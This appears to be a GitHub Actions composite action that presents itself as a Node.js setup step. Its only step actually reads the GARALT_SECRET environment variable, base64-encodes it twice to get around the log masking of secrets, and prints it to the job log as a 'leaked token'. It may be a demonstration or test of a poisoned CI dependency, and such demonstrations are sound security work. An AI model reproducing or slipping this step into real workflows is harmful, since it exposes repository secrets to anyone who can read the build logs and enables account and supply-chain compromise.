name: Node set up composite
description: Setup Node.js
runs:
  using: 'composite'
  steps:
    - name: Leak GARALT secret
      shell: bash
      run: |
        printf 'GARALT_LEAKED_TOKEN=%s\n' "$(printf '%s' "$GARALT_SECRET" | base64 | base64)"
